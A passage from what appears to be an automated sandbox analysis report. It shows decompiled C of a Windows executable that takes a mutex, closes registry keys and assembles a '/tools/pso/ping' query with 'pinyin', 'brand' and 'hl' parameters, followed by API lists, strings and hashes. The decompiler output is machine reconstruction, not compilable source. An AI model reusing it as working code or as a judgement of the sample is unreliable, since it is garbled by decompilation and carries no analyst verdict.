												_t357 = _t359 + 4;
												__eflags = _t177;
												if(__eflags != 0) {
													__eflags = _v377;
													if(__eflags != 0) {
														_t281 =  &_v280;
														E004C65A0(_t281,  &_v377, __eflags);
													}
												}
												E004C33F0(_t319, __eflags);
												_v4 = 3;
												_t180 = _v344 + 0xfffffff0;
												_t320 =  &(_t180[3]);
												asm("lock xadd [edx], ecx");
												__eflags = (_t281 | 0xffffffff) - 1;
												if((_t281 | 0xffffffff) - 1 <= 0) {
                                                                                                                                                                    													_t320 =  *( *_t180);
                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)(_t320 + 4))))(_t180);
                                                                                                                                                                    												}
                                                                                                                                                                    												_v4 = 2;
                                                                                                                                                                    												_t182 = _v356 + 0xfffffff0;
                                                                                                                                                                    												asm("lock xadd [ecx], edx");
                                                                                                                                                                    												_t322 = (_t320 | 0xffffffff) - 1;
                                                                                                                                                                    												__eflags = _t322;
                                                                                                                                                                    												if(_t322 <= 0) {
                                                                                                                                                                    													_t322 =  *( *_t182);
                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)(_t322 + 4))))(_t182);
                                                                                                                                                                    												}
                                                                                                                                                                    												_v4 = 1;
                                                                                                                                                                    												_t184 = _v372 + 0xfffffff0;
                                                                                                                                                                    												asm("lock xadd [ecx], edx");
                                                                                                                                                                    												_t316 = (_t322 | 0xffffffff) - 1;
                                                                                                                                                                    												__eflags = (_t322 | 0xffffffff) - 1;
                                                                                                                                                                    												if((_t322 | 0xffffffff) - 1 <= 0) {
                                                                                                                                                                    													_t316 =  *( *_t184);
                                                                                                                                                                    													 *((intOrPtr*)( *((intOrPtr*)( *( *_t184) + 4))))(_t184);
                                                                                                                                                                    												}
                                                                                                                                                                    												L70:
                                                                                                                                                                    												_t185 = _v352;
                                                                                                                                                                    												__eflags = _t185;
                                                                                                                                                                    												if(_t185 != 0) {
                                                                                                                                                                    													__eflags = _t185 - 0x80000001;
                                                                                                                                                                    													if(_t185 != 0x80000001) {
                                                                                                                                                                    														RegCloseKey(_t185);
                                                                                                                                                                    													}
                                                                                                                                                                    												}
                                                                                                                                                                    												ReleaseMutex(_t353);
                                                                                                                                                                    												CloseHandle(_t353);
                                                                                                                                                                    												_t155 = 1;
                                                                                                                                                                    												goto L74;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												goto L52;
                                                                                                                                                                    											}
                                                                                                                                                                    											do {
                                                                                                                                                                    												L52:
                                                                                                                                                                    												_t326 =  *(_t264 + 4 + _t337 * 8);
                                                                                                                                                                    												_push(_t326);
                                                                                                                                                                    												L004C3DC0(_t326, __eflags,  *((intOrPtr*)(_t264 + _t337 * 8)));
                                                                                                                                                                    												_t337 = _t337 + 1;
                                                                                                                                                                    												_t359 = _t359 + 8;
                                                                                                                                                                    												__eflags = _t337 - _t346;
                                                                                                                                                                    											} while (__eflags < 0);
                                                                                                                                                                    											goto L53;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t338 = 0;
                                                                                                                                                                    										_v312 = 0;
                                                                                                                                                                    										_v308 = 0;
                                                                                                                                                                    										_v304 = 0;
                                                                                                                                                                    										_v300 = 0;
                                                                                                                                                                    										_push( &_v312);
                                                                                                                                                                    										_t326 =  &_v376;
                                                                                                                                                                    										_v4 = 0xa;
                                                                                                                                                                    										L004C3AB0(_t326, __eflags,  &_v356);
                                                                                                                                                                    										_t347 = _v308;
                                                                                                                                                                    										_t264 = _v312;
                                                                                                                                                                    										_t359 = _t359 + 8;
                                                                                                                                                                    										__eflags = _t347;
                                                                                                                                                                    										if(_t347 <= 0) {
                                                                                                                                                                    											goto L53;
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = 0 - _t347;
                                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                                    											goto L60;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											goto L47;
                                                                                                                                                                    										}
                                                                                                                                                                    										do {
                                                                                                                                                                    											L47:
                                                                                                                                                                    											_t326 =  *(_t264 + _t338 * 8);
                                                                                                                                                                    											_push( *((intOrPtr*)(_t264 + 4 + _t338 * 8)));
                                                                                                                                                                    											E004C43F0(_t326, __eflags, _t326);
                                                                                                                                                                    											_t338 = _t338 + 1;
                                                                                                                                                                    											_t359 = _t359 + 8;
                                                                                                                                                                    											__eflags = _t338 - _t347;
                                                                                                                                                                    										} while (__eflags < 0);
                                                                                                                                                                    										goto L53;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										__eflags = _v12;
                                                                                                                                                                    										if(_v12 < 0) {
                                                                                                                                                                    											L55:
                                                                                                                                                                    											_t208 =  &_v16;
                                                                                                                                                                    											_v4 = 4;
                                                                                                                                                                    											asm("lock xadd [ecx], edx");
                                                                                                                                                                    											__eflags = (_t326 | 0xffffffff) - 1;
                                                                                                                                                                    											if((_t326 | 0xffffffff) - 1 <= 0) {
                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t208)) + 4))))(_t208);
                                                                                                                                                                    											}
                                                                                                                                                                    											L57:
                                                                                                                                                                    											_t353 = _v332;
                                                                                                                                                                    											goto L58;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t221 = E004C8190(_t353, L": ");
                                                                                                                                                                    										__eflags = _t221;
                                                                                                                                                                    										if(_t221 == 0) {
                                                                                                                                                                    											goto L55;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t222 = _t221 - _t353;
                                                                                                                                                                    										__eflags = _t222;
                                                                                                                                                                    										_t223 = _t222 >> 1;
                                                                                                                                                                    										_t348 = _t222 >> 1;
                                                                                                                                                                    										if(_t222 < 0) {
                                                                                                                                                                    											goto L55;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t331 =  &_v348;
                                                                                                                                                                    										L00413A70(_t223 - _v324, 3,  &_v348,  &_v376);
                                                                                                                                                                    										_v8 = 7;
                                                                                                                                                                    										_v372 = 0;
                                                                                                                                                                    										_t226 = E004C60D0( &_v372);
                                                                                                                                                                    										__eflags = _t226;
                                                                                                                                                                    										if(_t226 == 0) {
                                                                                                                                                                    											L39:
                                                                                                                                                                    											L004C8A50( &_v348, _t331);
                                                                                                                                                                    											_v4 = 4;
                                                                                                                                                                    											L004C8A50( &_v376, _t331);
                                                                                                                                                                    											goto L57;
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = _v368;
                                                                                                                                                                    										if(_v368 == 0) {
                                                                                                                                                                    											goto L39;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t331 =  &_v376;
                                                                                                                                                                    										L004C7D60(_v12 - _t348 - 2,  &_v360,  &_v376);
                                                                                                                                                                    										_push( &_v364);
                                                                                                                                                                    										_v8 = 8;
                                                                                                                                                                    										L004C7C80(0x5333cc);
                                                                                                                                                                    										_t349 = _v368;
                                                                                                                                                                    										_t236 = E004C8130(_t349, L"\r\n ");
                                                                                                                                                                    										__eflags = _t236;
                                                                                                                                                                    										if(_t236 == 0) {
                                                                                                                                                                    											L36:
                                                                                                                                                                    											_t237 =  *(_t349 - 0xc);
                                                                                                                                                                    											L37:
                                                                                                                                                                    											__eflags = _t237 - 0x40;
                                                                                                                                                                    											if(_t237 <= 0x40) {
                                                                                                                                                                    												_t350 = _v372;
                                                                                                                                                                    												__eflags = _t350 - 0x44;
                                                                                                                                                                    												if(_t350 > 0x44) {
                                                                                                                                                                    													L42:
                                                                                                                                                                    													_t326 =  &_v364;
                                                                                                                                                                    													_t238 = L00413A00(_t237, _t326);
                                                                                                                                                                    													_v8 = 9;
                                                                                                                                                                    													L004C4D90(_t326, __eflags, _t350,  *_t238);
                                                                                                                                                                    													_t359 = _t359 + 8;
                                                                                                                                                                    													L004C8A50( &_v320, _t326);
                                                                                                                                                                    													L43:
                                                                                                                                                                    													L004C8A50( &_v364, _t326);
                                                                                                                                                                    													L004C8A50( &_v352, _t326);
                                                                                                                                                                    													goto L55;
                                                                                                                                                                    												}
                                                                                                                                                                    												_t77 = _t350 + 0x4c5b44; // 0x1010100
                                                                                                                                                                    												switch( *((intOrPtr*)(( *_t77 & 0x000000ff) * 4 +  &M004C5B3C))) {
                                                                                                                                                                    													case 0:
                                                                                                                                                                    														goto L43;
                                                                                                                                                                    													case 1:
                                                                                                                                                                    														goto L42;
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    											L004C8A50( &_v364, _t331);
                                                                                                                                                                    											goto L39;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t245 = _t236 - _t349;
                                                                                                                                                                    										__eflags = _t245;
                                                                                                                                                                    										_t237 = _t245 >> 1;
                                                                                                                                                                    										if(_t245 >= 0) {
                                                                                                                                                                    											goto L37;
                                                                                                                                                                    										}
                                                                                                                                                                    										goto L36;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								L22:
                                                                                                                                                                    								_v364 = 0xffffffff;
                                                                                                                                                                    								goto L23;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						L004C8A50( &_v372, _t316);
                                                                                                                                                                    						goto L70;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v4 = 1;
                                                                                                                                                                    						_t254 = _v372 + 0xfffffff0;
                                                                                                                                                                    						_t316 =  &(_t254[3]);
                                                                                                                                                                    						asm("lock xadd [edx], esi");
                                                                                                                                                                    						__eflags = _t343 - 1;
                                                                                                                                                                    						if(_t343 - 1 <= 0) {
                                                                                                                                                                    							_t316 =  *( *_t254);
                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *_t254) + 4))))(_t254);
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_v368 = _t341;
                                                                                                                                                                    				_t341 =  &_v368;
                                                                                                                                                                    				if(E004C7590(_t260, _t333, _t341) < 0 || _v368 <= 1) {
                                                                                                                                                                    					goto L7;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L12;
                                                                                                                                                                    				}
                                                                                                                                                                    			}
                                                                                                                                                                    0x004c59bd
                                                                                                                                                                    0x004c59c5
                                                                                                                                                                    0x004c59ca
                                                                                                                                                                    0x004c59ce
                                                                                                                                                                    0x004c59d2
                                                                                                                                                                    0x004c59d5
                                                                                                                                                                    0x004c59d7
                                                                                                                                                                    0x004c59f3
                                                                                                                                                                    0x004c59f3
                                                                                                                                                                    0x004c59f5
                                                                                                                                                                    0x004c59f8
                                                                                                                                                                    0x004c59fd
                                                                                                                                                                    0x004c59fd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c59f5
                                                                                                                                                                    0x004c59d9
                                                                                                                                                                    0x004c59db
                                                                                                                                                                    0x004c5a38
                                                                                                                                                                    0x004c5a3d
                                                                                                                                                                    0x004c5a42
                                                                                                                                                                    0x004c5a47
                                                                                                                                                                    0x004c5a4b
                                                                                                                                                                    0x004c5a4f
                                                                                                                                                                    0x004c5a54
                                                                                                                                                                    0x004c5a59
                                                                                                                                                                    0x004c5a5c
                                                                                                                                                                    0x004c5a5e
                                                                                                                                                                    0x004c5a60
                                                                                                                                                                    0x004c5a65
                                                                                                                                                                    0x004c5a67
                                                                                                                                                                    0x004c5a6b
                                                                                                                                                                    0x004c5a6b
                                                                                                                                                                    0x004c5a65
                                                                                                                                                                    0x004c5a70
                                                                                                                                                                    0x004c5a75
                                                                                                                                                                    0x004c5a81
                                                                                                                                                                    0x004c5a84
                                                                                                                                                                    0x004c5a8a
                                                                                                                                                                    0x004c5a8f
                                                                                                                                                                    0x004c5a91
                                                                                                                                                                    0x004c5a95
                                                                                                                                                                    0x004c5a9b
                                                                                                                                                                    0x004c5a9b
                                                                                                                                                                    0x004c5a9d
                                                                                                                                                                    0x004c5aa9
                                                                                                                                                                    0x004c5ab2
                                                                                                                                                                    0x004c5ab6
                                                                                                                                                                    0x004c5ab7
                                                                                                                                                                    0x004c5ab9
                                                                                                                                                                    0x004c5abd
                                                                                                                                                                    0x004c5ac3
                                                                                                                                                                    0x004c5ac3
                                                                                                                                                                    0x004c5ac5
                                                                                                                                                                    0x004c5ad1
                                                                                                                                                                    0x004c5ada
                                                                                                                                                                    0x004c5ade
                                                                                                                                                                    0x004c5adf
                                                                                                                                                                    0x004c5ae1
                                                                                                                                                                    0x004c5ae5
                                                                                                                                                                    0x004c5aeb
                                                                                                                                                                    0x004c5aeb
                                                                                                                                                                    0x004c5aed
                                                                                                                                                                    0x004c5aed
                                                                                                                                                                    0x004c5af1
                                                                                                                                                                    0x004c5af3
                                                                                                                                                                    0x004c5af5
                                                                                                                                                                    0x004c5afa
                                                                                                                                                                    0x004c5afd
                                                                                                                                                                    0x004c5afd
                                                                                                                                                                    0x004c5afa
                                                                                                                                                                    0x004c5b04
                                                                                                                                                                    0x004c5b0b
                                                                                                                                                                    0x004c5b11
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c59dd
                                                                                                                                                                    0x004c59dd
                                                                                                                                                                    0x004c59dd
                                                                                                                                                                    0x004c59e4
                                                                                                                                                                    0x004c59e6
                                                                                                                                                                    0x004c59eb
                                                                                                                                                                    0x004c59ec
                                                                                                                                                                    0x004c59ef
                                                                                                                                                                    0x004c59ef
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c59dd
                                                                                                                                                                    0x004c5930
                                                                                                                                                                    0x004c5932
                                                                                                                                                                    0x004c5936
                                                                                                                                                                    0x004c593a
                                                                                                                                                                    0x004c593e
                                                                                                                                                                    0x004c5946
                                                                                                                                                                    0x004c594c
                                                                                                                                                                    0x004c5950
                                                                                                                                                                    0x004c5958
                                                                                                                                                                    0x004c595d
                                                                                                                                                                    0x004c5961
                                                                                                                                                                    0x004c5965
                                                                                                                                                                    0x004c5968
                                                                                                                                                                    0x004c596a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5970
                                                                                                                                                                    0x004c5972
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5978
                                                                                                                                                                    0x004c5978
                                                                                                                                                                    0x004c597c
                                                                                                                                                                    0x004c597f
                                                                                                                                                                    0x004c5981
                                                                                                                                                                    0x004c5986
                                                                                                                                                                    0x004c5987
                                                                                                                                                                    0x004c598a
                                                                                                                                                                    0x004c598a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c57eb
                                                                                                                                                                    0x004c57eb
                                                                                                                                                                    0x004c57ef
                                                                                                                                                                    0x004c5a00
                                                                                                                                                                    0x004c5a00
                                                                                                                                                                    0x004c5a09
                                                                                                                                                                    0x004c5a11
                                                                                                                                                                    0x004c5a16
                                                                                                                                                                    0x004c5a18
                                                                                                                                                                    0x004c5a22
                                                                                                                                                                    0x004c5a22
                                                                                                                                                                    0x004c5a24
                                                                                                                                                                    0x004c5a24
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5a24
                                                                                                                                                                    0x004c57fc
                                                                                                                                                                    0x004c5801
                                                                                                                                                                    0x004c5803
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5809
                                                                                                                                                                    0x004c5809
                                                                                                                                                                    0x004c580b
                                                                                                                                                                    0x004c580d
                                                                                                                                                                    0x004c580f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c5823
                                                                                                                                                                    0x004c5827
                                                                                                                                                                    0x004c582c
                                                                                                                                                                    0x004c583c
                                                                                                                                                                    0x004c5844
                                                                                                                                                                    0x004c5849
                                                                                                                                                                    0x004c584b
                                                                                                                                                                    0x004c58ac
                                                                                                                                                                    0x004c58b0
                                                                                                                                                                    0x004c58b9
                                                                                                                                                                    0x004c58c1
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,?,?,00000001), ref: 004C55A0
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,00000001), ref: 004C55BF
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001), ref: 004C5623
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C562A
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 004C5631
                                                                                                                                                                    • _free.LIBCMT ref: 004C59F8
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004C5AFD
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 004C5B04
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004C5B0B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait_free
                                                                                                                                                                    • String ID: $%s: $4QS$events$rlz$stateful-events${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
                                                                                                                                                                    • API String ID: 1472798645-827787425
                                                                                                                                                                    • Opcode ID: fcc368407e85c1ad4a8d2dc0959a52f71530f38a09482c0b2e39c8e0e3170e98
                                                                                                                                                                    • Instruction ID: dad3d65853d57aff4d5e984dbcbc968e28b96125280c55577d750db3e7c31097
                                                                                                                                                                    • Opcode Fuzzy Hash: fcc368407e85c1ad4a8d2dc0959a52f71530f38a09482c0b2e39c8e0e3170e98
                                                                                                                                                                    • Instruction Fuzzy Hash: E502EE381087408FD390DB29C881F5FB7E4BFC4314F444A1EF99A87292DB79A985CB5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                                    			E004C26B0(void* __ecx, void* __edx, void* __ebp, char _a4, void* _a8, char _a12, short _a284, char _a420, signed int _a4524, char _a4532, struct _SECURITY_ATTRIBUTES* _a4540, void* _a4548) {
                                                                                                                                                                    				void* _v0;
                                                                                                                                                                    				void* _v4;
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				char _v12;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                    				short _t63;
                                                                                                                                                                    				void* _t67;
                                                                                                                                                                    				void* _t76;
                                                                                                                                                                    				void* _t77;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                    				void* _t82;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    				void* _t105;
                                                                                                                                                                    				void* _t110;
                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                    				void* _t112;
                                                                                                                                                                    				char* _t120;
                                                                                                                                                                    				void* _t133;
                                                                                                                                                                    				void* _t134;
                                                                                                                                                                    				signed int _t135;
                                                                                                                                                                    				void* _t139;
                                                                                                                                                                    				void* _t140;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t142;
                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                    				void* _t144;
                                                                                                                                                                    				void* _t147;
                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                    				void* _t151;
                                                                                                                                                                    
                                                                                                                                                                    				_t126 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x5175fc);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				L00504AA0(0x11c0);
                                                                                                                                                                    				_t58 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_a4524 = _t58 ^ _t149;
                                                                                                                                                                    				_push(__ebp);
                                                                                                                                                                    				_t60 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t60 ^ _t149);
                                                                                                                                                                    				 *[fs:0x0] =  &_a4532;
                                                                                                                                                                    				_t147 = _a4548;
                                                                                                                                                                    				_t133 = __ecx;
                                                                                                                                                                    				_v0 = __edx;
                                                                                                                                                                    				_t152 = __edx;
                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                    					L10:
                                                                                                                                                                    					_t63 = 0;
                                                                                                                                                                    					L39:
                                                                                                                                                                    					 *[fs:0x0] = _a4532;
                                                                                                                                                                    					_pop(_t134);
                                                                                                                                                                    					_pop(_t139);
                                                                                                                                                                    					_pop(_t110);
                                                                                                                                                                    					return L004EEDC9(_t63, _t110, _a4524 ^ _t149, _t126, _t134, _t139);
                                                                                                                                                                    				}
                                                                                                                                                                    				E00411150(__edx);
                                                                                                                                                                    				_t111 = 0;
                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                    				_t140 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
                                                                                                                                                                    				_push(_t140);
                                                                                                                                                                    				_a8 = _t140;
                                                                                                                                                                    				_t67 = L004C5D10(_t126, _t152);
                                                                                                                                                                    				_t149 = _t149 + 4;
                                                                                                                                                                    				if(_t67 != 0) {
                                                                                                                                                                    					_t111 = 0 | WaitForSingleObject(_t140, 0x1388) == 0x00000000;
                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_a4540 = 0;
                                                                                                                                                                    				if(_t111 == 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					CloseHandle(_t140);
                                                                                                                                                                    					goto L10;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v4 = 0x80000001;
                                                                                                                                                                    				_a4540 = 1;
                                                                                                                                                                    				if(E004C75E0() == 0) {
                                                                                                                                                                    					L0040CC20( &_v12);
                                                                                                                                                                    					_push(L"pinyin");
                                                                                                                                                                    					_a4540 = 2;
                                                                                                                                                                    					L004C7EF0( &_v12, L"%s=%s", 0x533220);
                                                                                                                                                                    					_t151 = _t149 + 0xc;
                                                                                                                                                                    					__eflags = _t133;
                                                                                                                                                                    					if(_t133 != 0) {
                                                                                                                                                                    						_push(_t133);
                                                                                                                                                                    						L004C8A40( &_v12, L"&%s=%s", L"brand");
                                                                                                                                                                    						_t151 = _t151 + 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					__eflags = _t147;
                                                                                                                                                                    					if(_t147 != 0) {
                                                                                                                                                                    						_push(_t147);
                                                                                                                                                                    						L004C8A40( &_v12, L"&%s=%s", L"hl");
                                                                                                                                                                    						_t151 = _t151 + 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					_a420 = 0;
                                                                                                                                                                    					_t112 = L004C4A00( &_a420);
                                                                                                                                                                    					__eflags = _t112;
                                                                                                                                                                    					if(_t112 == 0) {
                                                                                                                                                                    						_t135 = 0;
                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                    						_t21 = _t135 + 1; // 0x1
                                                                                                                                                                    						_t142 = _t21;
                                                                                                                                                                    						do {
                                                                                                                                                                    							_a284 = 0;
                                                                                                                                                                    							_t76 = L004C4B10(_t142, __eflags,  &_a284);
                                                                                                                                                                    							_t151 = _t151 + 4;
                                                                                                                                                                    							__eflags = _t76;
                                                                                                                                                                    							if(_t76 != 0) {
                                                                                                                                                                    								__eflags = _a284;
                                                                                                                                                                    								if(_a284 != 0) {
                                                                                                                                                                    									 *(_t151 + 0x2c + _t135 * 4) = _t142;
                                                                                                                                                                    									_t135 = _t135 + 1;
                                                                                                                                                                    									__eflags = _t135;
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							_t142 =  &(_t142->nLength);
                                                                                                                                                                    							__eflags = _t142 - 0x44;
                                                                                                                                                                    						} while (__eflags < 0);
                                                                                                                                                                    						 *(_t151 + 0x2c + _t135 * 4) = 0;
                                                                                                                                                                    						goto L23;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L004C8A40( &_v12, L"&%s",  &_a420);
                                                                                                                                                                    						_t151 = _t151 + 8;
                                                                                                                                                                    						L23:
                                                                                                                                                                    						_a420 = 0;
                                                                                                                                                                    						_t120 = 0x55b204;
                                                                                                                                                                    						__eflags = _t112;
                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                    							_t120 =  &_a12;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t129 =  &_a420;
                                                                                                                                                                    						_t77 = E004C5030(_t120,  &_a420, __eflags);
                                                                                                                                                                    						__eflags = _t77;
                                                                                                                                                                    						if(_t77 != 0) {
                                                                                                                                                                    							_t129 =  &_a420;
                                                                                                                                                                    							L004C8A40( &_v12, L"&%s",  &_a420);
                                                                                                                                                                    							_t151 = _t151 + 8;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags = _t112;
                                                                                                                                                                    						if(_t112 != 0) {
                                                                                                                                                                    							L0040CC20( &_v8);
                                                                                                                                                                    							_a4540 = 3;
                                                                                                                                                                    							_t93 = E004C7010(_t129, _t147,  &_v8);
                                                                                                                                                                    							_t151 = _t151 + 4;
                                                                                                                                                                    							__eflags = _t93;
                                                                                                                                                                    							if(_t93 != 0) {
                                                                                                                                                                    								_push(_v8);
                                                                                                                                                                    								L004C8A40( &_v12, L"&%s=%s", 0x533228);
                                                                                                                                                                    								_t151 = _t151 + 0xc;
                                                                                                                                                                    							}
                                                                                                                                                                    							_a4540 = 2;
                                                                                                                                                                    							L004C8A50( &_v8, _t129);
                                                                                                                                                                    						}
                                                                                                                                                                    						_a420 = 0;
                                                                                                                                                                    						_t78 = E004C3160(0,  &_a420, _t147);
                                                                                                                                                                    						__eflags = _t78;
                                                                                                                                                                    						if(_t78 != 0) {
                                                                                                                                                                    							L004C8A40( &_v12, L"&%s",  &_a420);
                                                                                                                                                                    							_t151 = _t151 + 8;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t143 = _v12;
                                                                                                                                                                    						_push(_t143);
                                                                                                                                                                    						L004C7EF0(_v0, L"%s?%s", L"/tools/pso/ping");
                                                                                                                                                                    						_t81 = _t143 - 0x10;
                                                                                                                                                                    						_t149 = _t151 + 0xc;
                                                                                                                                                                    						_a4540 = 1;
                                                                                                                                                                    						asm("lock xadd [ecx], edx");
                                                                                                                                                                    						_t126 = 0xfffffffffffffffe;
                                                                                                                                                                    						__eflags = 0xfffffffffffffffe;
                                                                                                                                                                    						if(0xfffffffffffffffe <= 0) {
                                                                                                                                                                    							_t126 =  *((intOrPtr*)( *_t81));
                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t81)) + 4))))(_t81);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t82 = _v4;
                                                                                                                                                                    						__eflags = _t82;
                                                                                                                                                                    						if(_t82 != 0) {
                                                                                                                                                                    							__eflags = _t82 - 0x80000001;
                                                                                                                                                                    							if(_t82 != 0x80000001) {
                                                                                                                                                                    								RegCloseKey(_t82);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t144 = _a8;
                                                                                                                                                                    						ReleaseMutex(_t144);
                                                                                                                                                                    						CloseHandle(_t144);
                                                                                                                                                                    						_t63 = 1;
                                                                                                                                                                    						goto L39;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t105 = _v4;
                                                                                                                                                                    				if(_t105 != 0 && _t105 != 0x80000001) {
                                                                                                                                                                    					RegCloseKey(_t105);
                                                                                                                                                                    				}
                                                                                                                                                                    				ReleaseMutex(_t140);
                                                                                                                                                                    				goto L9;
                                                                                                                                                                    			}
                                                                                                                                                                    0x004c27db
                                                                                                                                                                    0x004c27db
                                                                                                                                                                    0x004c27de
                                                                                                                                                                    0x004c27e0
                                                                                                                                                                    0x004c27e2
                                                                                                                                                                    0x004c27f1
                                                                                                                                                                    0x004c27f6
                                                                                                                                                                    0x004c27f6
                                                                                                                                                                    0x004c2802
                                                                                                                                                                    0x004c280f
                                                                                                                                                                    0x004c2811
                                                                                                                                                                    0x004c2813
                                                                                                                                                                    0x004c2830
                                                                                                                                                                    0x004c2830
                                                                                                                                                                    0x004c2832
                                                                                                                                                                    0x004c2832
                                                                                                                                                                    0x004c2835
                                                                                                                                                                    0x004c283e
                                                                                                                                                                    0x004c2849
                                                                                                                                                                    0x004c284e
                                                                                                                                                                    0x004c2851
                                                                                                                                                                    0x004c2853
                                                                                                                                                                    0x004c2855
                                                                                                                                                                    0x004c285e
                                                                                                                                                                    0x004c2860
                                                                                                                                                                    0x004c2864
                                                                                                                                                                    0x004c2864
                                                                                                                                                                    0x004c2864
                                                                                                                                                                    0x004c285e
                                                                                                                                                                    0x004c2865
                                                                                                                                                                    0x004c2866
                                                                                                                                                                    0x004c2866
                                                                                                                                                                    0x004c286b
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004c2815
                                                                                                                                                                    0x004c2826
                                                                                                                                                                    0x004c282b
                                                                                                                                                                    0x004c2873
                                                                                                                                                                    0x004c2875
                                                                                                                                                                    0x004c287d
                                                                                                                                                                    0x004c2882
